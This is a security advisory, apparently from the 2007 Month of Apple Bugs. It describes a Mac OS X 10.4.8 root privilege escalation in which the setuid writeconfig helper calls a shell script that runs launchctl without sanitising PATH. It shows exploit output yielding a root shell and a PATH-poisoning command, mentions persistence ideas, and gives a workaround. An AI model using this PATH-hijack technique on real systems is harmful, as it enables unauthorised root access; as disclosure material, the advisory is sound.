BACK

CREDIT

POC or EXPLOIT

REFERENCES


Stay tuned

Summary

Apple provides the following description in the The Preference Application documentation:

System Preferences is the standard location for presenting system-level preferences on OSX. The preference panes shipped with Mac OS X include panes affecting hardware (such as the Sound, Mouse, and Display panes), software integrated into the system (such as the Dock and Screen Saver panes), and behavior applicable to every application (such as the International and General panes). When application preferences apply to the system or to the user's environment as a whole, a developer can make the preference pane available to System Preferences.

Several of the default preference panes rely on a setuid helper, writeconfig.

writeconfig will attempt to start various services by using /sbin/service. Unfortunately, it's simple shell script that doesn't sanitize its PATH environment variable when calling the launchctl utility. This can be abused for executing arbitrary binaries with root privileges.

Affected versions

Verified on Mac OS X 10.4.8 (8L2127).

Proof of concept, exploit or instructions to reproduce

The provided (simplistic) exploit will create a root setuid shell wrapper at /tmp/shX. It relies on minimal interaction by the user, read the 'Exploitation conditions' section as this is just one of the possible methods to abuse the issue.

$ ruby MOAB-21-01-2007.rb 
++ Click on Sharing and then click on Windows Sharing...
sh-2.05b# id
uid=501(lmh) gid=501(lmh) euid=0(root) groups=501(lmh), 81(appserveradm),
79(appserverusr), 80(admin)    
sh-2.05b# ls -al /private/tmp/
total 72
(...)
-rwxr-xr-x   1 lmh   wheel  13344 Jan 21 19:29 launchctl
-rwsr-xr-x   1 root  wheel  13344 Jan 21 19:29 shX
-rw-r--r--   1 lmh   wheel     78 Jan 21 19:29 t.c
sh-2.05b# exit
exit
			

Note: Nothing is being replaced by this exploit. Simply remove the files created at /tmp.

Debugging information

The following information shows the hardcoded paths in the writeconfig binary and the lack of PATH sanitization (ex. is binary to be executed located at a path writable by non-root users?) in /sbin/services:

$ strings /System/Library/PrivateFrameworks/Admin.framework/Resources/writeconfig | grep '/sbin/'
/usr/sbin/ntpdate -bs
/usr/sbin/ntpd -f /var/run/ntp.drift -p /var/run/ntpd.pid
/usr/sbin/ntpdate
/usr/sbin/nvram
/sbin/service
/usr/sbin/apachectl
/usr/sbin/xgridctl
/usr/sbin/chown
/sbin/mount_hfs
/usr/sbin/mDNSResponder
/usr/sbin/ntpdate -bs
/usr/sbin/ntpd -f /var/run/ntp.drift -p /var/run/ntpd.pid
/usr/sbin/ntpdate
/usr/sbin/nvram
/sbin/service
/usr/sbin/apachectl
/usr/sbin/xgridctl
/usr/sbin/chown
/sbin/mount_hfs
/usr/sbin/mDNSResponder

$ cat /sbin/service | grep launchctl
        [ "$2" == start ] && launchctl load -w /System/Library/LaunchDaemons/$1.plist
        [ "$2" == stop  ] && launchctl unload -w /System/Library/LaunchDaemons/$1.plist

kevin-finisterres-computer:~ kf$ ls -al
/System/Library/PrivateFrameworks/Admin.framework/Resources/writeconfig
-rwsr-xr-x   1 root  wheel  141028 Jul 19  2006
/System/Library/PrivateFrameworks/Admin.framework/Resources/writeconfig

$ PATH="/Pwndertino" /Applications/System\ Preferences.app/Contents/MacOS/*
(...)
/sbin/service: line 115: launchctl: command not found
/sbin/service: line 115: launchctl: command not found
			

Apple: running/wrapping shell scripts from setuid binaries is a really Bad Idea ™.

Notes

Exploitation conditions

While some may argue that this requires 'user interaction', it's not true. The provided exploit is simply an example of how to abuse the issue in the easiest way possible. Although, it could be abused via Applescript (which in fact provides complete GUI scripting facilities) or by 'poisoning' the environment variables of the current user, and for example, placing the backdoor at the /Users/Shared path (to be persistent against reboots and cleanups of temporal directories). Via Applescript, possibly no interaction would be needed, although, by just tampering the PATH environment variable, the user would still need to interact with the Sharing preferences panel.

Depending on time availability, we might provide a exploit demonstrating these methods as well.

Workaround or temporary solution

Modify /sbin/service:

$ head /sbin/service 
#!/bin/sh

set -e
export PATH="/bin:/sbin:/usr/sbin:/usr/bin"

# don't let people kill us. We shouldn't be long, so this isn't a big deal.

trap "" TSTP
trap "" HUP
trap "" INT
			
"By using responsible disclosure - the vulnerability and exploit lifetimes can be decreased. Patches can be made more quickly. At least that’s what we experience in practice today." -- Dissertations on the unbalanced disclosure-patch times equation, by Dreg Futile Mghee.